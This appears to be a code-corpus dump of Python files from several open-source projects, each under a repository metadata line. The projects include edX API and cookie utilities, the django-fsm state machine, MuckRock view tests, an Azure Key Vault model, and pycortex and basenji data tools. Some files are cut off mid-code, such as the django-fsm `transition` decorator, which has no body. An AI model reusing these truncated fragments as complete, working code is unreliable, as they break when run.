socket_options += [(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)]
super(TCPKeepAliveAdapter, self).__init__(
socket_options=socket_options, **kwargs
)
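# Minimal usage sketch for the adapter above (the host URL is an assumption,
# not part of the library):
#   >>> import requests
#   >>> from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
#   >>> session = requests.Session()
#   >>> session.mount('https://', TCPKeepAliveAdapter(idle=120, interval=10))
#   >>> session.get('https://example.com')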
eduNEXT/edx-platform | openedx/core/djangoapps/api_admin/api/v1/views.py | Python | agpl-3.0 | 2,304 | 0.003038 | """
API Views.
"""
from django_filters.rest_framework import DjangoFilterBackend
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.generics import ListAPIView
from openedx.core.lib.api.authentication import BearerAuthentication
from openedx.core.djangoapps.api_admin.api.v1 import serializers as api_access_serializers
from openedx.core.djangoapps.api_admin.models import ApiAccessRequest
from openedx.core.djangoapps.api_admin.api.filters import IsOwnerOrStaffFilterBackend
class ApiAccessRequestView(ListAPIView):
"""
Return `API Access Requests` in the form of a paginated list.
Raises:
NotFound: Raised if user with `username` provided in `GET` parameters does not exist.
PermissionDenied: Raised if `username` is provided in `GET` parameters but the requesting
user does not have access rights to filter results.
Example:
`GET: /api-admin/api/v1/api_access_request/`
{
"count": 1,
"num_pages": 1,
"current_page": 1,
"results": [
            {
                "id": 1,
                "created": "2017-09-25T08:41:48.934364Z",
                "modified": "2017-09-25T08:42:04.185209Z",
                "user": 6,
                "status": "denied",
                "website": "https://www.example.com/",
                "reason": "Example",
                "company_name": "Example Name",
                "company_address": "Silicon Valley",
                "site": 1,
                "contacted": true
            }
],
"next": null,
"start": 0,
"previous": null
}
"""
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticated, )
serializer_class = api_access_serializers.ApiAccessRequestSerializer
filter_backends = (IsOwnerOrStaffFilterBackend, DjangoFilterBackend)
queryset = ApiAccessRequest.objects.all()
filterset_fields = ('user__username', 'status', 'company_name', 'site__domain', 'contacted')
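    # Example request against this view (illustrative; the host and token
    # are assumptions, not part of this module):
    #   curl -H "Authorization: JWT <token>" \
    #     "https://lms.example.com/api-admin/api/v1/api_access_request/?status=approved"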
WW-Digital/django-activity-stream | example_project/testapp/streams.py | Python | bsd-3-clause | 444 | 0.004505 | from datetime import datetime
from django.contrib.contenttypes.models import ContentType
from actstream.managers import ActionManager, stream
class MyActionManager(ActionManager):
@stream
def testfoo(self, object, time=None):
if time is None:
time = datetime.now()
        return object.actor_actions.filter(timestamp__lte=time)
@stream
    def testbar(self, verb):
return self.filter(verb=verb)
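# Usage sketch (assumes this manager is registered with django-activity-stream,
# e.g. ACTSTREAM_SETTINGS = {'MANAGER': 'testapp.streams.MyActionManager'}):
#   from actstream.models import Action
#   Action.objects.testfoo(user)       # user's actions up to now
#   Action.objects.testbar('posted')   # actions whose verb is 'posted'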
deis/django-fsm | django_fsm/__init__.py | Python | mit | 9,452 | 0.001375 | # -*- coding: utf-8 -*-
"""
State tracking functionality for django models
"""
import inspect
from collections import namedtuple
from functools import wraps
from django.db import models
from django.db.models.signals import class_prepared
from django.utils.functional import curry
from django_fsm.signals import pre_transition, post_transition
__all__ = ["TransitionNotAllowed", "FSMFieldMixin", "FSMField",
'FSMIntegerField', 'FSMKeyField', 'transition', 'can_proceed']
# South support; see http://south.aeracode.org/docs/tutorial/part4.html#simple-inheritance
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], [r"^django_fsm\.FSMField"])
add_introspection_rules([], [r"^django_fsm\.FSMIntegerField"])
add_introspection_rules([], [r"^django_fsm\.FSMKeyField"])
class TransitionNotAllowed(Exception):
"""Raise when a transition is not allowed"""
Transition = namedtuple('Transition', ['name', 'source', 'target', 'conditions', 'method'])
def get_available_FIELD_transitions(instance, field):
curr_state = field.get_state(instance)
transitions = field.transitions[instance.__class__]
for name, transition in transitions.items():
meta = transition._django_fsm
        for state in [curr_state, '*']:
if state in meta.transitions:
target, conditions = meta.transitions[state]
if all(map(lambda condition: condition(instance), conditions)):
yield Transition(
name=name,
source=state,
                    target=target,
conditions=conditions,
method=transition)
def get_all_FIELD_transitions(instance, field):
return field.get_all_transitions(instance.__class__)
class FSMMeta(object):
"""
Models methods transitions meta information
"""
def __init__(self, field, method):
self.field = field
self.transitions = {} # source -> (target, conditions)
def add_transition(self, source, target, conditions=[]):
if source in self.transitions:
raise AssertionError('Duplicate transition for {} state'.format(source))
self.transitions[source] = (target, conditions)
def has_transition(self, state):
"""
Lookup if any transition exists from current model state using current method
"""
return state in self.transitions or '*' in self.transitions
def conditions_met(self, instance, state):
"""
Check if all conditions have been met
"""
_, conditions = self.transitions.get(state, (None, []))
if not conditions:
_, conditions = self.transitions.get('*', (None, []))
return all(map(lambda condition: condition(instance), conditions))
def next_state(self, current_state):
try:
return self.transitions[current_state][0]
except KeyError:
return self.transitions['*'][0]
class FSMFieldDescriptor(object):
def __init__(self, field):
self.field = field
def __get__(self, instance, type=None):
if instance is None:
raise AttributeError('Can only be accessed via an instance.')
return self.field.get_state(instance)
def __set__(self, instance, value):
if self.field.protected and self.field.name in instance.__dict__:
raise AttributeError('Direct {} modification is not allowed'.format(self.field.name))
self.field.set_state(instance, value)
class FSMFieldMixin(object):
descriptor_class = FSMFieldDescriptor
def __init__(self, *args, **kwargs):
self.protected = kwargs.pop('protected', False)
self.transitions = {} # cls -> (transitions name -> method)
super(FSMFieldMixin, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(FSMFieldMixin, self).deconstruct()
if self.protected:
kwargs['protected'] = self.protected
return name, path, args, kwargs
def get_state(self, instance):
return instance.__dict__[self.name]
def set_state(self, instance, state):
instance.__dict__[self.name] = state
def change_state(self, instance, method, *args, **kwargs):
meta = method._django_fsm
method_name = method.__name__
current_state = self.get_state(instance)
if not (meta.has_transition(current_state) and meta.conditions_met(instance, current_state)):
raise TransitionNotAllowed(
"Can't switch from state '{}' using method '{}'".format(current_state, method_name))
next_state = meta.next_state(current_state)
signal_kwargs = {
'sender': instance.__class__,
'instance': instance,
'name': method_name,
'source': current_state,
'target': next_state
}
pre_transition.send(**signal_kwargs)
result = method(instance, *args, **kwargs)
if next_state:
self.set_state(instance, next_state)
post_transition.send(**signal_kwargs)
return result
def get_all_transitions(self, instance_cls):
"""
Returns [(source, target, name, method)] for all field transitions
"""
transitions = self.transitions[instance_cls]
for name, transition in transitions.items():
meta = transition._django_fsm
for source, (target, conditions) in meta.transitions.items():
yield Transition(
name=name,
source=source,
target=target,
conditions=conditions,
method=transition)
def contribute_to_class(self, cls, name, virtual_only=False):
self.base_cls = cls
super(FSMFieldMixin, self).contribute_to_class(cls, name, virtual_only=virtual_only)
setattr(cls, self.name, self.descriptor_class(self))
setattr(cls, 'get_available_{}_transitions'.format(self.name),
curry(get_available_FIELD_transitions, field=self))
setattr(cls, 'get_all_{}_transitions'.format(self.name),
curry(get_all_FIELD_transitions, field=self))
class_prepared.connect(self._collect_transitions)
def _collect_transitions(self, *args, **kwargs):
sender = kwargs['sender']
if not issubclass(sender, self.base_cls):
return
def is_field_transition_method(attr):
return (inspect.ismethod(attr) or inspect.isfunction(attr)) \
and hasattr(attr, '_django_fsm') \
and attr._django_fsm.field in [self, self.name]
sender_transitions = {}
transitions = inspect.getmembers(sender, predicate=is_field_transition_method)
for method_name, method in transitions:
method._django_fsm.field = self
sender_transitions[method_name] = method
self.transitions[sender] = sender_transitions
class FSMField(FSMFieldMixin, models.CharField):
"""
State Machine support for Django model as CharField
"""
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 50)
super(FSMField, self).__init__(*args, **kwargs)
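# Minimal usage sketch (a hypothetical model, not part of django_fsm itself):
#   class BlogPost(models.Model):
#       state = FSMField(default='draft', protected=True)
#
#       @transition(field='state', source='draft', target='published')
#       def publish(self):
#           pass  # side effects go here; on success the field moves to 'published'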
class FSMIntegerField(FSMFieldMixin, models.IntegerField):
"""
Same as FSMField, but stores the state value in an IntegerField.
db_index is True by default.
"""
def __init__(self, *args, **kwargs):
kwargs.setdefault('db_index', True)
super(FSMIntegerField, self).__init__(*args, **kwargs)
class FSMKeyField(FSMFieldMixin, models.ForeignKey):
"""
State Machine support for Django model
"""
def get_state(self, instance):
return instance.__dict__[self.attname]
def set_state(self, instance, state):
instance.__dict__[self.attname] = self.to_python(state)
def transition(field, source='*', target=None, conditions=[]):
"""
    Method decorator to mark allowed transitions.

    Set target to None if the current state needs to be validated and
    not changed after the function call.
    """
edx-solutions/edx-platform | openedx/core/djangoapps/user_authn/cookies.py | Python | agpl-3.0 | 12,065 | 0.002404 | """
Utility functions for setting "logged in" cookies used by subdomains.
"""
import json
import logging
import time
import six
from django.conf import settings
from django.contrib.auth.models import User
from django.dispatch import Signal
from django.urls import NoReverseMatch, reverse
from django.utils.http import http_date
from edx_rest_framework_extensions.auth.jwt import cookies as jwt_cookies
from edx_rest_framework_extensions.auth.jwt.constants import JWT_DELIMITER
from oauth2_provider.models import Application
from openedx.core.djangoapps.oauth_dispatch.adapters import DOTAdapter
from openedx.core.djangoapps.oauth_dispatch.api import create_dot_access_token
from openedx.core.djangoapps.oauth_dispatch.jwt import create_jwt_from_token
from openedx.core.djangoapps.user_api.accounts.utils import retrieve_last_sitewide_block_completed
from openedx.core.djangoapps.user_authn.exceptions import AuthFailedError
from student.models import CourseEnrollment
log = logging.getLogger(__name__)
CREATE_LOGON_COOKIE = Signal(providing_args=['user', 'response'])
JWT_COOKIE_NAMES = (
# Header and payload sections of a JSON Web Token containing user
# information and used as an access token.
jwt_cookies.jwt_cookie_header_payload_name(),
# Signature section of a JSON Web Token.
jwt_cookies.jwt_cookie_signature_name(),
)
# TODO (ARCH-245): Remove the following deprecated cookies.
DEPRECATED_LOGGED_IN_COOKIE_NAMES = (
# Set to 'true' if the user is logged in.
settings.EDXMKTG_LOGGED_IN_COOKIE_NAME,
# JSON-encoded dictionary with user information.
settings.EDXMKTG_USER_INFO_COOKIE_NAME,
)
ALL_LOGGED_IN_COOKIE_NAMES = JWT_COOKIE_NAMES + DEPRECATED_LOGGED_IN_COOKIE_NAMES
def are_logged_in_cookies_set(request):
""" Check whether the request has logged in cookies set. """
if _are_jwt_cookies_disabled():
cookies_that_should_exist = DEPRECATED_LOGGED_IN_COOKIE_NAMES
else:
cookies_that_should_exist = ALL_LOGGED_IN_COOKIE_NAMES
return all(
cookie_name in request.COOKIES
for cookie_name in cookies_that_should_exist
) and request.COOKIES[settings.EDXMKTG_LOGGED_IN_COOKIE_NAME]
def delete_logged_in_cookies(response):
"""
Delete cookies indicating that the user is logged in.
Arguments:
response (HttpResponse): The response sent to the client.
Returns:
HttpResponse
"""
for cookie_name in ALL_LOGGED_IN_COOKIE_NAMES:
response.delete_cookie(
cookie_name,
path='/',
domain=settings.SESSION_COOKIE_DOMAIN
)
return response
def standard_cookie_settings(request):
""" Returns the common cookie settings (e.g. expiration time). """
cookie_settings = {
'domain': settings.SESSION_COOKIE_DOMAIN,
'path': '/',
'httponly': None,
}
_set_expires_in_cookie_settings(cookie_settings, request.session.get_expiry_age())
# In production, TLS should be enabled so that this cookie is encrypted
# when we send it. We also need to set "secure" to True so that the browser
# will transmit it only over secure connections.
#
# In non-production environments (acceptance tests, devstack, and sandboxes),
# we still want to set this cookie. However, we do NOT want to set it to "secure"
# because the browser won't send it back to us. This can cause an infinite redirect
# loop in the third-party auth flow, which calls `are_logged_in_cookies_set` to determine
# whether it needs to set the cookie or continue to the next pipeline stage.
cookie_settings['secure'] = request.is_secure()
return cookie_settings
def _set_expires_in_cookie_settings(cookie_settings, expires_in):
"""
Updates the max_age and expires fields of the given cookie_settings,
based on the value of expires_in.
"""
expires_time = time.time() + expires_in
expires = http_date(expires_time)
cookie_settings.update({
'max_age': expires_in,
'expires': expires,
})
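# Worked example (values are illustrative): with expires_in=3600, the helper
# above adds a one-hour max_age and a matching RFC 1123 'expires' string:
#   cookie_settings = {}
#   _set_expires_in_cookie_settings(cookie_settings, 3600)
#   cookie_settings['max_age']  # -> 3600
#   cookie_settings['expires']  # -> http_date(time.time() + 3600)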
def set_logged_in_cookies(request, response, user):
"""
Set cookies at the time of user login. See ALL_LOGGED_IN_COOKIE_NAMES to see
which cookies are set.
Arguments:
request (HttpRequest): The request to the view, used to calculate
the cookie's expiration date based on the session expiration date.
response (HttpResponse): The response on which the cookie will be set.
user (User): The currently logged in user.
Returns:
HttpResponse
"""
# Note: The user may not yet be set on the request object by this time,
# especially during third party authentication. So use the user object
# that is passed in when needed.
if user.is_authenticated and not user.is_anonymous:
# JWT cookies expire at the same time as other login-related cookies
# so that cookie-based login determination remains consistent.
cookie_settings = standard_cookie_settings(request)
_set_deprecated_logged_in_cookie(response, cookie_settings)
_set_deprecated_user_info_cookie(response, request, user, cookie_settings)
_create_and_set_jwt_cookies(response, request, cookie_settings, user=user)
CREATE_LOGON_COOKIE.send(sender=None, user=user, response=response)
return response
def refresh_jwt_cookies(request, response, user):
"""
Resets the JWT related cookies in the response for the given user.
"""
cookie_settings = standard_cookie_settings(request)
_create_and_set_jwt_cookies(response, request, cookie_settings, user=user)
return response
def _set_deprecated_user_info_cookie(response, request, user, cookie_settings):
"""
Sets the user info cookie on the response.
The user info cookie has the following format:
{
"version": 1,
"username": "test-user",
"header_urls": {
"account_settings": "https://example.com/account/settings",
"resume_block":
"https://example.com//courses/org.0/course_0/Run_0/jump_to/i4x://org.0/course_0/vertical/vertical_4"
"learner_profile": "https://example.com/u/test-user",
"logout": "https://example.com/logout"
}
}
"""
user_info = _get_user_info_cookie_data(request, user)
response.set_cookie(
settings.EDXMKTG_USER_INFO_COOKIE_NAME,
json.dumps(user_info),
**cookie_settings
)
def _set_deprecated_logged_in_cookie(response, cookie_settings):
""" Sets the logged in cookie on the response. """
# Backwards compatibility: set the cookie indicating that the user
# is logged in. This is just a boolean value, so it's not very useful.
# In the future, we should be able to replace this with the "user info"
# cookie set below.
response.set_cookie(
settings.EDXMKTG_LOGGED_IN_COOKIE_NAME,
'true',
**cookie_settings
)
return response
def _get_user_info_cookie_data(request, user):
""" Returns information that will populate the user info cookie. """
    # Set a cookie with user info. This can be used by external sites
# to customize content based on user information. Currently,
# we include information that's used to customize the "account"
# links in the header of subdomain sites (such as the marketing site).
header_urls = {'logout': reverse('logout')}
    # Unfortunately, this app is currently used by both the LMS and Studio login pages.
# If we're in Studio, we won't be able to reverse the account/profile URLs.
# To handle this, we don't add the URLs if we can't reverse them.
# External sites will need to have fallback mechanisms to handle this case
# (most likely just hiding the links).
try:
header_urls['account_settings'] = reverse('account_settings')
header_urls['learner_profile'] = reverse('learner_profile', kwargs={'username': user.username})
except NoReverseMatch:
pass
# Add 'resume course' last completed block
try:
header_urls['resume_block'] = retrieve_last_sitewide_block_completed(user)
    except User.DoesNotExist:
        pass
erasche/galactic-radio-telescope | web/context_processors.py | Python | agpl-3.0 | 246 | 0.004065 | from django.conf import settings
cached_data = {
'URL_PREFIX': settings.URL_PREFIX,
'APP_VERSION': settings.GRT_VERSION,
    'GIT_REVISION': settings.RAVEN_CONFIG.get('release', None),
}
def url_prefix(request):
return cached_data
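# To enable (assumed wiring; adjust to the project's settings module):
#   TEMPLATES[0]['OPTIONS']['context_processors'].append(
#       'web.context_processors.url_prefix')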
MuckRock/muckrock | muckrock/crowdsource/tests/test_views.py | Python | agpl-3.0 | 9,147 | 0.00164 | """Tests for crowdsource views"""
# pylint: disable=invalid-name
# Django
from django.contrib.auth.models import AnonymousUser
from django.test import RequestFactory, TestCase
from django.urls import reverse
# Third Party
from nose.tools import assert_false, assert_true, eq_
# MuckRock
from muckrock.core.factories import ProjectFactory, UserFactory
from muckrock.core.test_utils import mock_middleware
from muckrock.crowdsource.factories import (
CrowdsourceFactory,
CrowdsourceResponseFactory,
)
from muckrock.crowdsource.views import CrowdsourceDetailView, CrowdsourceFormView
class TestCrowdsourceDetailView(TestCase):
"""Test who is allowed to see the crowdsource details"""
def setUp(self):
self.request_factory = RequestFactory()
self.view = CrowdsourceDetailView.as_view()
def test_anonymous_cannot_view(self):
"""Anonymous users cannot view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_authenticated_cannot_view(self):
"""Authenticated users cannot view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
        response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_owner_can_view(self):
"""Owner can view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
        url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = crowdsource.user
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_staff_can_view(self):
"""Staff can view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory(is_staff=True)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_project_admin_can_view(self):
"""Project admin can view a crowdsource's details"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(project_admin=True, project=project)
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_project_non_admin_cannot_view(self):
"""Project contributor cannot view a crowdsource's details if project
admin option is not on
"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(project_admin=False, project=project)
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
class TestCrowdsourceFormView(TestCase):
"""Test who is allowed to fill out assignment forms"""
def setUp(self):
self.request_factory = RequestFactory()
self.view = CrowdsourceFormView.as_view()
def test_public(self):
"""Anybody can fill out a public assignment"""
crowdsource = CrowdsourceFactory(status="open")
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_private(self):
"""Everybody cannot fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_project(self):
"""Project members can fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_owner(self):
"""Crowdsource owner can fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = crowdsource.user
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_has_assignment_limit(self):
"""Test the has assignment method with a user limit"""
# pylint: disable=protected-access
view = CrowdsourceFormView()
crowdsource = CrowdsourceFactory(user_limit=True)
user = UserFactory()
ip_address = "127.0.0.1"
# the user hasn't replied yet, should have an assignment
assert_true(view._has_assignment(crowdsource, user, None))
# the user replied, they may not reply again
CrowdsourceResponseFactory(crowdsource=crowdsource, user=user)
assert_false(view._has_assignment(crowdsource, user, None))
# the ip address hasn't replied yet, should have an assignment
assert_true(view._has_assignment(crowdsource, AnonymousUser(), ip_address))
# the ip address replied, they may not reply again
CrowdsourceResponseFactory(
crowdsource=crowdsource, user=None, ip_address=ip_address
)
assert_false(view._has_assignment(crowdsource, AnonymousUser(), ip_address))
def test_has_assignment_no_limit(self):
"""Test the has assignment method without a user limit"""
SUSE/azure-sdk-for-python | azure-keyvault/azure/keyvault/models/issuer_parameters.py | Python | mit | 1,158 | 0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class IssuerParameters(Model):
"""Parameters for the issuer of the X509 component of a certificate.
:param name: Name of the referenced issuer object or reserved names; for
example, 'Self' or 'Unknown'.
:type name: str
:param certificate_type: Type of certificate to be requested from the
issuer provider.
:type certificate_type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'certificate_type': {'key': 'cty', 'type': 'str'},
}
def __init__(self, name=None, certificate_type=None):
self.name = name
self.certificate_type = certificate_type
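# Usage sketch (the values are illustrative): on the wire, certificate_type
# is serialized under the short key 'cty', per _attribute_map above.
#   params = IssuerParameters(name='Self', certificate_type='OV-SSL')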
gallantlab/pycortex | examples/webgl/static.py | Python | bsd-2-clause | 675 | 0 | """
======================
Create a static viewer
======================
A static viewer is a brain viewer that exists permanently on a filesystem
The viewer is stored in a directory that stores html, javascript, data, etc
The viewer directory must be hosted by a server such as nginx
"""
import cortex
import numpy as np
np.random.seed(1234)
# gather data Volume
volume = cortex.Volume.random(subject='S1', xfmname='fullhead')
# select path for static viewer on disk
viewer_path = '/path/to/store/viewer'
# create viewer
cortex.webgl.make_static(outpath=viewer_path, data=volume, recache=True)
# a webserver such as nginx can then be used to host the static viewer
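# Example nginx location block for hosting the viewer (paths are assumptions;
# match them to viewer_path above):
#   location /viewer/ {
#       alias /path/to/store/viewer/;
#   }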
calico/basenji | basenji/dataset.py | Python | apache-2.0 | 29,864 | 0.014633 | # Copyright 2017 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
import glob
import json
import os
import pdb
import sys
from natsort import natsorted
import numpy as np
import tensorflow as tf
# TFRecord constants
TFR_INPUT = 'sequence'
TFR_OUTPUT = 'target'
def file_to_records(filename):
return tf.data.TFRecordDataset(filename, compression_type='ZLIB')
class SeqDataset:
def __init__(self, data_dir, split_label, batch_size, shuffle_buffer=128,
seq_length_crop=None, mode='eval', tfr_pattern=None):
"""Initialize basic parameters; run compute_stats; run make_dataset."""
self.data_dir = data_dir
self.split_label = split_label
self.batch_size = batch_size
self.shuffle_buffer = shuffle_buffer
self.seq_length_crop = seq_length_crop
self.mode = mode
self.tfr_pattern = tfr_pattern
# read data parameters
data_stats_file = '%s/statistics.json' % self.data_dir
with open(data_stats_file) as data_stats_open:
data_stats = json.load(data_stats_open)
self.seq_length = data_stats['seq_length']
self.seq_depth = data_stats.get('seq_depth',4)
self.target_length = data_stats['target_length']
self.num_targets = data_stats['num_targets']
if self.tfr_pattern is None:
self.tfr_path = '%s/tfrecords/%s-*.tfr' % (self.data_dir, self.split_label)
self.num_seqs = data_stats['%s_seqs' % self.split_label]
else:
self.tfr_path = '%s/tfrecords/%s' % (self.data_dir, self.tfr_pattern)
self.compute_stats()
self.make_dataset()
def batches_per_epoch(self):
return self.num_seqs // self.batch_size
def distribute(self, strategy):
self.dataset = strategy.experimental_distribute_dataset(self.dataset)
def generate_parser(self, raw=False):
def parse_proto(example_protos):
"""Parse TFRecord protobuf."""
# define features
features = {
TFR_INPUT: tf.io.FixedLenFeature([], tf.string),
TFR_OUTPUT: tf.io.FixedLenFeature([], tf.string)
}
# parse example into features
parsed_features = tf.io.parse_single_example(example_protos, features=features)
# decode sequence
sequence = tf.io.decode_raw(parsed_features[TFR_INPUT], tf.uint8)
if not raw:
sequence = tf.reshape(sequence, [self.seq_length, self.seq_depth])
if self.seq_length_crop is not None:
crop_len = (self.seq_length - self.seq_length_crop) // 2
sequence = sequence[crop_len:-crop_len,:]
sequence = tf.cast(sequence, tf.float32)
# decode targets
targets = tf.io.decode_raw(parsed_features[TFR_OUTPUT], tf.float16)
if not raw:
targets = tf.reshape(targets, [self.target_length, self.num_targets])
targets = tf.cast(targets, tf.float32)
return sequence, targets
return parse_proto
def make_dataset(self, cycle_length=4):
"""Make Dataset w/ transformations."""
# initialize dataset from TFRecords glob
tfr_files = natsorted(glob.glob(self.tfr_path))
if tfr_files:
# dataset = tf.data.Dataset.list_files(tf.constant(tfr_files), shuffle=False)
dataset = tf.data.Dataset.from_tensor_slices(tfr_files)
else:
print('Cannot order TFRecords %s' % self.tfr_path, file=sys.stderr)
dataset = tf.data.Dataset.list_files(self.tfr_path)
# train
if self.mode == 'train':
# repeat
dataset = dataset.repeat()
# interleave files
dataset = dataset.interleave(map_func=file_to_records,
cycle_length=cycle_length,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# shuffle
dataset = dataset.shuffle(buffer_size=self.shuffle_buffer,
reshuffle_each_iteration=True)
# valid/test
else:
# flat mix files
dataset = dataset.flat_map(file_to_records)
# (no longer necessary in tf2?)
# helper for training on single genomes in a multiple genome mode
# if self.num_seqs > 0:
# dataset = dataset.map(self.generate_parser())
dataset = dataset.map(self.generate_parser())
# cache (runs OOM)
# dataset = dataset.cache()
# batch
dataset = dataset.batch(self.batch_size)
# prefetch
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
# hold on
self.dataset = dataset
def compute_stats(self):
""" Iterate over the TFRecords to count sequences, and infer
seq_depth and num_targets."""
with tf.name_scope('stats'):
# read TF Records
dataset = tf.data.Dataset.list_files(self.tfr_path)
dataset = dataset.flat_map(file_to_records)
dataset = dataset.map(self.generate_parser(raw=True))
dataset = dataset.batch(1)
self.num_seqs = 0
if self.num_targets is not None:
targets_nonzero = np.zeros(self.num_targets, dtype='bool')
# for (seq_raw, genome), targets_raw in dataset:
for seq_raw, targets_raw in dataset:
# infer seq_depth
seq_1hot = seq_raw.numpy().reshape((self.seq_length,-1))
if self.seq_depth is None:
self.seq_depth = seq_1hot.shape[-1]
else:
assert(self.seq_depth == seq_1hot.shape[-1])
# infer num_targets
targets1 = targets_raw.numpy().reshape(self.target_length,-1)
if self.num_targets is None:
self.num_targets = targets1.shape[-1]
          targets_nonzero = ((targets1 != 0).sum(axis=0) > 0)
else:
assert(self.num_targets == targets1.shape[-1])
targets_nonzero = np.logical_or(targets_nonzero, (targets1 != 0).sum(axis=0) > 0)
# count sequences
self.num_seqs += 1
# warn user about nonzero targets
if self.num_seqs > 0:
self.num_targets_nonzero = (targets_nonzero > 0).sum()
      print('%s has %d sequences with %d/%d targets' % (self.tfr_path, self.num_seqs, self.num_targets_nonzero, self.num_targets), flush=True)
else:
self.num_targets_nonzero = None
print('%s has %d sequences with 0 targets' % (self.tfr_path, self.num_seqs), flush=True)
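  # Usage sketch (the data directory and batch size are assumptions):
  #   ds = SeqDataset('data/heart_l131k', 'train', batch_size=4)
  #   for seqs, targets in ds.dataset.take(1):
  #     print(seqs.shape, targets.shape)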
def numpy(self, return_inputs=True, return_outputs=True, step=1, dtype='float16'):
""" Convert TFR inputs and/or outputs to numpy arrays."""
with tf.name_scope('numpy'):
# initialize dataset from TFRecords glob
tfr_files = natsorted(glob.glob(self.tfr_path))
if tfr_files:
# dataset = tf.data.Dataset.list_files(tf.constant(tfr_files), shuffle=False)
dataset = tf.data.Dataset.from_tensor_slices(tfr_files)
else:
print('Cannot order TFRecords %s' % self.tfr_path, file=sys.stderr)
dataset = tf.data.Dataset.list_files(self.tfr_path)
# read TF Records
dataset = dataset.flat_map(file_to_records)
dataset = dataset.map(self.generate_parser(raw=True))
dataset = dataset.batch(1)
# initialize inputs and outputs
seqs_1hot = []
targets = []
# collect inputs and outputs
for seq_raw, targets_raw in dataset:
# sequence
if return_inputs:
seq_1hot = seq_raw.numpy().reshape((self.seq_length,-1))
if self.seq_length_crop is not None:
crop_len = (self.seq_length - self.seq_length_crop) // 2
seq_1hot = seq_1hot[crop_len:-crop_len,:]
seqs_1hot.append(seq_1hot)
# targets
if return_outputs:
targets1 = targets_raw.numpy().astype(dtype)
targets1 = np.reshape(targets1, (self.target_length,-1))
if step > 1:
step_i = np.arange(0, self.target_length, step)
